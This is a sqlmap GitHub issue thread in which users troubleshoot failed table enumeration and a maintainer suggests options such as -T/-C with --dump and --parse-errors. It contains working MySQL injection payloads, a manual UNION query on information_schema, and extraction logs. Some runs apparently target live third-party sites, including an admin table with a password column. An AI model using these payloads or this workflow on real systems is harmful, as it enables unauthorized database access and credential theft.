### ISSUE TITLE
[ERROR] unable to retrieve the table names for any database

### ISSUE THREAD

**Issue by IceAges** [sqlmapproject/sqlmap#1301]
Hello ,
I receive this error while trying to fetch tables from a database. Could someone tell me what seems to be the problem?
Here is the output without v3 
-------------------------------------
sqlmap -u *REDACTED* -D redacted_db --tables

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 02:48:02

[02:48:02] [INFO] resuming back-end DBMS 'mysql' 
[02:48:02] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: *redacted*
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: *redacted* RLIKE (SELECT (CASE WHEN (8911=8911) THEN 100 ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
    Payload: *redacted* AND ROW(3832,6791)>(SELECT COUNT(*),CONCAT(0x7175716a71,(SELECT (CASE WHEN (3832=3832) THEN 1 ELSE 0 END)),0x7165696471,FLOOR(RAND(0)*2))x FROM (SELECT 4660 UNION SELECT 7223 UNION SELECT 7311 UNION SELECT 5634)a GROUP BY x)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: *redacted* AND SLEEP(5)
---
[02:48:03] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
[02:48:03] [INFO] fetching tables for database: '*redacted_db*'
[02:48:04] [WARNING] the SQL query provided does not return any output
[02:48:04] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[02:48:04] [INFO] fetching number of tables for database '*redacted_db*'
[02:48:04] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:48:04] [INFO] retrieved:
[02:48:09] [WARNING] time-based comparison requires larger statistical model, please wait.........................      
[02:48:43] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 

[02:48:46] [WARNING] unable to retrieve the number of tables for database '*redacted_db*'
[02:48:46] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] n
No tables found
[02:53:25] [INFO] fetched data logged to text files under ://

--------------

..and with -v3

--------------

sqlmap -u *REDACTED* -D *redacted_db* --tables -v3

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 03:00:21

[03:00:21] [DEBUG] cleaning up configuration parameters
[03:00:22] [DEBUG] setting the HTTP timeout
[03:00:22] [DEBUG] setting the HTTP method to GET
[03:00:22] [DEBUG] creating HTTP requests opener object
[03:00:22] [INFO] resuming back-end DBMS 'mysql' 
[03:00:22] [INFO] testing connection to the target URL
[03:00:23] [DEBUG] declared web page charset 'utf-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: *redacted*
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: *redacted* RLIKE (SELECT (CASE WHEN (8911=8911) THEN 100 ELSE 0x28 END))
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
    Payload: *redacted* AND ROW(3832,6791)>(SELECT COUNT(*),CONCAT(0x7175716a71,(SELECT (CASE WHEN (3832=3832) THEN 1 ELSE 0 END)),0x7165696471,FLOOR(RAND(0)*2))x FROM (SELECT 4660 UNION SELECT 7223 UNION SELECT 7311 UNION SELECT 5634)a GROUP BY x)
    Vector: AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: *redacted* AND SLEEP(5)
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[03:00:23] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
[03:00:23] [INFO] fetching tables for database: '*redacted_db*'
[03:00:23] [PAYLOAD] 100 AND ROW(9146,5372)>(SELECT COUNT(*),CONCAT(0x7175716a71,(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x646973636f756e746369676172735f32303135)),0x7165696471,FLOOR(RAND(0)*2))x FROM (SELECT 6539 UNION SELECT 6090 UNION SELECT 6376 UNION SELECT 3889)a GROUP BY x)
[03:00:24] [WARNING] the SQL query provided does not return any output
[03:00:24] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[03:00:24] [INFO] fetching number of tables for database '*redacted_db*'
[03:00:24] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[03:00:24] [PAYLOAD] 100 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x646973636f756e746369676172735f32303135),1,1))>51) THEN 100 ELSE 0x28 END))
[03:00:26] [PAYLOAD] 100 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x646973636f756e746369676172735f32303135),1,1))>54) THEN 100 ELSE 0x28 END))
[03:00:27] [PAYLOAD] 100 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x646973636f756e746369676172735f32303135),1,1))>56) THEN 100 ELSE 0x28 END))
[03:00:28] [PAYLOAD] 100 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x646973636f756e746369676172735f32303135),1,1))>57) THEN 100 ELSE 0x28 END))
[03:00:29] [INFO] retrieved: 
[03:00:29] [DEBUG] performed 4 queries in 4.79 seconds
[03:00:29] [PAYLOAD] 100 AND 9631=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x646973636f756e746369676172735f32303135),1,1))>51),SLEEP(5),9631)
[03:00:29] [WARNING] time-based comparison requires larger statistical model, please wait.........................      
[03:01:01] [PAYLOAD] 100 AND 9631=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x646973636f756e746369676172735f32303135),1,1))>48),SLEEP(5),9631)
[03:01:01] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
[03:01:02] [PAYLOAD] 100 AND 9631=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x646973636f756e746369676172735f32303135),1,1))>1),SLEEP(5),9631)
[03:01:03] [INFO] retrieved: 
[03:01:03] [DEBUG] performed 3 queries in 34.17 seconds
[03:01:03] [WARNING] unable to retrieve the number of tables for database '*redacted_db*'
[03:01:03] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] n
No tables found
[03:01:06] [INFO] fetched data logged to text files under 

---------

--banner output

[03:04:40] [INFO] the back-end DBMS is MySQL
[03:04:40] [INFO] fetching banner
[03:04:40] [INFO] resumed: 5.0.51a
web application technology: Apache
back-end DBMS: MySQL 5
banner:    '5.0.51a'
---------

I did tried with --no-cast , time-delay , with no changes.

Any help will be much appreciated!

Thanks!

EDIT: with --dbs , I received the error 
[WARNING] information_schema not available

**Comment by stamparm** [comment]
`information_schema` is probably blocked as a keyword, its missing or the dbms user used by the web application doesn't have enough privileges to access it

**Comment by IceAges** [comment]
Oh! But is there are a way to access it ?

**Comment by stamparm** [comment]
In those cases I mentioned, no.

That's why you've been asked politely by sqlmap:

`[03:01:03] [ERROR] unable to retrieve the table names for any database do you want to use common table existence check? [y/N/q] `

and you answered `n`

**Comment by IceAges** [comment]
Ah! I forgot to mentionate that even with Y option, still didn't received anything ! 
In few other cases , I was able to rertrieve tables, but no columns!

If I know for sure what tables and colums it uses, can I "tell" sqlmap to look for them?

**Comment by stamparm** [comment]
`-C` and `-T` are used in those kind of cases

**Comment by IceAges** [comment]
Ok, will try that ! I though there is something missing in payloads.xml !

Thanks for your time!

**Comment by IceAges** [comment]
Last think - I tried with -D *db* -T *table* -v3 but nothing really happens! And I know for sure that, that table exist!

**Comment by stamparm** [comment]
Well, you should tell sqlmap what to do with `-T` and `-D`. For example: `--dump -D foo -T bar`.

Also, try to use --parse-errors along the way. Maybe you'll find some useful messages

**Comment by IceAges** [comment]
I am so tired at this hour that I think i'll call it for the night, and a bit of the day :)
I wrote "db" just for the sake of adding a word, but of course I add the correct DB :)
This was the last think I tried : 

-D db_2015 -T admin -C id,name,email,pass,level -v3 --parse-errors

And nothing :
[04:06:07] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
[04:06:07] [INFO] fetched data logged to text files under

**Comment by stamparm** [comment]
and where is `--dump` there?

**Comment by IceAges** [comment]
Bah! Forgot about it! Now is somehow working ( didn't guess it seems, the correct columns )! I am out of here ! To tired :) Will try again later!

Thanks again!

**Comment by mexorsu** [comment]
As a matter of fact, I had the same problem with reading information schema even though it should work. I manually was able to retreive information from information schema from exactly the same endpoint, and without much fuss with payload like: ' union select 1, table_name, table_schema from information_schema.tables where '1' = '1 but sqlmap failed to find anything even when using "common table names scan".

**Comment by stamparm** [comment]
@mexorsu you could always try to debug the problem. For example inspect the traffic with `-t` or `--proxy`. Also, inspecting potential DBMS error messages with `--parse-errors`. Or trying to run payloads (seen with `-v 3`) inside the browser.

**Comment by mexorsu** [comment]
Will try to do just that as soon as i have more time to play, will get back to you if I find anything interesting.

**Comment by onlypentest** [comment]
sqlmap.py -u "URL" --data="name=asd&email=asdfas%40gmail.lcom&contactno=s&pname=c&msg=c&submit=" -p "name"

[12:30:35] [INFO] testing connection to the target URL
[12:30:35] [INFO] testing if the target URL is stable
[12:30:36] [INFO] target URL is stable
[12:30:37] [WARNING] heuristic (basic) test shows that POST parameter 'name' might not be injectable
[12:30:37] [INFO] testing for SQL injection on POST parameter 'name'
[12:30:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:30:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[12:30:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:30:44] [INFO] heuristics detected web page charset 'ascii'
[12:30:47] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[12:30:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[12:30:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[12:30:57] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:30:57] [INFO] testing 'MySQL inline queries'
[12:30:58] [INFO] testing 'PostgreSQL inline queries'
[12:30:58] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[12:30:58] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[12:31:00] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[12:31:02] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[12:31:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[12:31:07] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[12:31:10] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[12:31:12] [INFO] testing 'Oracle AND time-based blind'
[12:31:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:31:15] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it with option '--dbms'
[12:31:25] [INFO] target URL appears to be UNION injectable with 4 columns
[12:31:25] [WARNING] applying generic concatenation (CONCAT)
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[12:32:13] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[12:32:57] [WARNING] POST parameter 'name' does not seem to be injectable
[12:32:57] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[12:32:57] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 11 times

**Comment by korsa741** [comment]
i know the thread is old but i have suggestion u can add this in ur command line  
 --current-user --privileges it will work

**Comment by JXDMDEV** [comment]
I'm having the same program sqlmap not being able to extract the fault is not the tool I'm a newbie and not being able to use the right commands help me please

**Comment by JXDMDEV** [comment]
└─$ sqlmap -u https://www.jxxxxxxxxxxx.br/nxxxxxxxxxa.php?id=186 --dbs --random-agent --level 1 --risk 1 -Dxxxxxxxtel --tables --dump --threads=10 --hex --time-sec=60      
        ___
       __H__                                                                                                                                                           
 ___ ___[,]_____ ___ ___  {1.7.8#stable}                                                                                                                               
|_ -| . [(]     | .'| . |                                                                                                                                              
|___|_  [.]_|_|_|__,|  _|                                                                                                                                              
      |_|V...       |_|   https://sqlmap.org                                                                                                                           

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:52:26 /2023-09-08/

[14:52:26] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.9) Gecko/2009042113 Linux Mint/6 (Felicia) Firefox/3.0.9' from file '/usr/share/sqlmap/data/txt/user-agents.txt'                                                                                                              
[14:52:27] [INFO] resuming back-end DBMS 'mysql' 
[14:52:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=186 AND 4410=4410
---
[14:52:28] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[14:52:28] [INFO] fetching database names
[14:52:28] [INFO] fetching number of databases
[14:52:28] [INFO] resumed: 3
[14:52:28] [INFO] retrieving the length of query output
[14:52:48] [INFO] retrieved: 36      
[14:53:09] [INFO] retrieved: ion_schema                                      
[14:53:09] [INFO] retrieving the length of query output
[14:53:29] [INFO] retrieved: 30      
[14:53:49] [INFO] retrieved:              
[14:53:49] [INFO] retrieving the length of query output
[14:54:10] [INFO] retrieved: 36      
[14:54:34] [INFO] retrieved:                 
available databases [3]:
[*] `xxxx
[*] `xxxxxxxx
[*]xxxxxxx_schema

[14:54:34] [INFO] fetching tables for database: 'zzzzz
[14:54:34] [INFO] fetching number of tables for database 'xxxxxxxxl'
[14:54:34] [INFO] resumed: 0
[14:54:34] [WARNING] database 'xxxxxxxxx' appears to be empty
[14:54:34] [ERROR] unable to retrieve the table names for any database
Database: xxxxxxx

**Comment by JXDMDEV** [comment]
erro:

4:54:39] [INFO] fetching number of entries for table 'posts' in database 'jandir02_portel'
[14:54:39] [INFO] resumed: 5
[14:54:39] [INFO] retrieving the length of query output
[14:54:42] [INFO] retrieved:   
[14:54:46] [INFO] retrieved:   
[14:54:46] [INFO] retrieving the length of query output
[14:54:49] [INFO] retrieved:   
[14:54:53] [INFO] retrieved:   
[14:54:53] [INFO] retrieving the length of query output
[14:54:56] [INFO] retrieved:   
[14:55:04] [WARNING] there was a problem decoding value 'C' from expected hexadecimal form
[14:55:04] [INFO] retrieved: C   
[14:55:04] [INFO] retrieving the length of query output
[14:55:07] [INFO] retrieved:   
[14:55:07] [INFO] resumed: \x05\x11??
[14:55:07] [INFO] retrieving the length of query output
[14:55:10] [INFO] retrieved:   
[14:55:15] [INFO] retrieved:   
[14:55:15] [INFO] retrieving the length of query output
[14:55:18] [INFO] retrieved:   
[14:55:23] [INFO] retrieved:   
[14:55:23] [INFO] retrieving the length of query output
[14:55:27] [INFO] retrieved:   
[14:55:32] [INFO] retrieved:   
[14:55:32] [INFO] retrieving the length of query output
[14:55:32] [INFO] resumed: 4
[14:55:32] [INFO] resumed: ????
[14:55:32] [INFO] retrieving the length of query output
[14:55:35] [INFO] retrieved:   
[14:55:40] [INFO] retrieved:   
[14:55:40] [INFO] retrieving the length of query output
[14:55:44] [INFO] retrieved:   
[14:55:51] [INFO] retrieved:   
[14:55:51] [INFO] retrieving the length of query output
[14:55:57] [INFO] retrieved:   
[14:56:00] [INFO] retrieved:   
[14:56:00] [INFO] retrieving the length of query output
[14:56:01] [INFO] resumed: 1
[14:56:04] [INFO] retrieved:   
[14:56:04] [INFO] retrieving the length of query output
[14:56:08] [INFO] retrieved:   
[14:56:11] [INFO] retrieved:   
[14:56:11] [INFO] retrieving the length of query output
[14:56:14] [INFO] retrieved:   
[14:56:19] [INFO] retrieved:   
[14:56:19] [INFO] retrieving the length of query output
[14:56:19] [INFO] resumed: 4
[14:56:20] [INFO] resumed: 1???
[14:56:20] [INFO] retrieving the length of query output
[14:56:23] [INFO] retrieved:   
[14:56:28] [INFO] retrieved:   
[14:56:28] [INFO] retrieving the length of query output
[14:56:31] [INFO] retrieved:   
[14:56:42] [INFO] retrieved:   
[14:56:42] [INFO] retrieving the length of query output
[14:56:45] [INFO] retrieved:   
[14:56:52] [INFO] retrieved:   
[14:56:52] [INFO] retrieving the length of query output
[14:56:52] [INFO] resumed: 1
[14:56:56] [INFO] retrieved:   
[14:56:56] [INFO] retrieving the length of query output
[14:57:00] [INFO] retrieved:   
[14:57:07] [WARNING] there was a problem decoding value '1' from expected hexadecimal form
[14:57:07] [INFO] retrieved: 1   
[14:57:07] [INFO] retrieving the length of query output
[14:57:10] [INFO] retrieved:   
[14:57:17] [INFO] retrieved: C   
[14:57:17] [INFO] retrieving the length of query output
[14:57:19] [INFO] retrieved:   
[14:57:27] [INFO] retrieved:   
[14:57:28] [INFO] retrieving the length of query output
[14:57:33] [INFO] retrieved:   
[14:57:36] [INFO] retrieved:   
[14:57:36] [INFO] retrieving the length of query output
[14:57:38] [INFO] retrieved:   
[14:57:41] [INFO] retrieved:   
[14:57:41] [INFO] retrieving the length of query output
[14:57:44] [INFO] retrieved:   
[14:57:47] [INFO] retrieved:   
[14:57:47] [INFO] retrieving the length of query output
[14:57:50] [INFO] retrieved:   
[14:57:53] [INFO] retrieved:   
[14:57:53] [INFO] retrieving the length of query output
[14:57:56] [INFO] retrieved:   
[14:57:59] [INFO] retrieved:   
[14:57:59] [INFO] retrieving the length of query output
[14:58:03] [INFO] retrieved:   
[14:58:06] [INFO] retrieved:   
[14:58:06] [INFO] retrieving the length of query output
[14:58:08] [INFO] retrieved:   
[14:58:12] [INFO] retrieved:   
[14:58:12] [INFO] retrieving the length of query output
[14:58:16] [INFO] retrieved: 1   
[14:58:20] [INFO] retrieved:   
[14:58:20] [INFO] retrieving the length of query output
[14:58:22] [INFO] retrieved:   
[14:58:26] [INFO] retrieved:   
[14:58:26] [INFO] retrieving the length of query output
[14:58:32] [INFO] retrieved: 1   
[14:58:36] [INFO] retrieved:   
[14:58:36] [INFO] retrieving the length of query output
[14:58:39] [INFO] retrieved:   
[14:58:43] [INFO] retrieved:   
[14:58:43] [INFO] retrieving the length of query output
[14:58:46] [INFO] retrieved:   
[14:58:54] [WARNING] there was a problem decoding value '5' from expected hexadecimal form
[14:58:54] [INFO] retrieved: 5   
[14:58:54] [INFO] retrieving the length of query output
[14:58:58] [INFO] retrieved:   
[14:58:58] [INFO] resumed: 5
[14:58:58] [INFO] retrieving the length of query output
[14:59:04] [INFO] retrieved:   
[14:59:09] [INFO] retrieved:   
[14:59:09] [INFO] retrieving the length of query output
[14:59:12] [INFO] retrieved:   
[14:59:15] [INFO] retrieved:   
[14:59:15] [INFO] retrieving the length of query output
[14:59:21] [WARNING] there was a problem decoding value '4' from expected hexadecimal form
[14:59:21] [INFO] retrieved: 4   
[14:59:25] [WARNING] there was a problem decoding value '?C9?' from expected hexadecimal form
[14:59:25] [INFO] retrieved: ?C9?      
[14:59:25] [INFO] retrieving the length of query output
[14:59:28] [INFO] retrieved:   
[14:59:31] [INFO] retrieved:   
[14:59:31] [INFO] retrieving the length of query output
[14:59:33] [INFO] retrieved:   
[14:59:36] [INFO] retrieved:   
[14:59:36] [INFO] retrieving the length of query output

**Comment by stamparm** [comment]
@chenyuming98 so, you have THE NICEST case, where ACTUAL ERRORS are being returned, and you are raising the issue here instead of watching into the response traffic? man, this is sad

**Comment by chenyuming98** [comment]
> 所以，你遇到了最美好的情况，实际错误被返回，而你却在这里提出这个问题，而不是关注响应流量？天哪，真让人难过

You replied so quickly! After testing, I found that the syntax errors caused by sqlmap's malicious payloads during SQL concatenation were detected by the backend Java code. However, the Java server only logged these errors and did not return any response to the frontend. This resulted in sqlmap failing to obtain accurate information during blind injection testing, leading to incomplete or unretrievable table names and other data. Haha, this is neither the fault of the Java server code nor sqlmap! I tried using an old legacy server I wrote before, and sqlmap worked perfectly with it. I have to say, your response speed on GitHub is amazingly fast too!
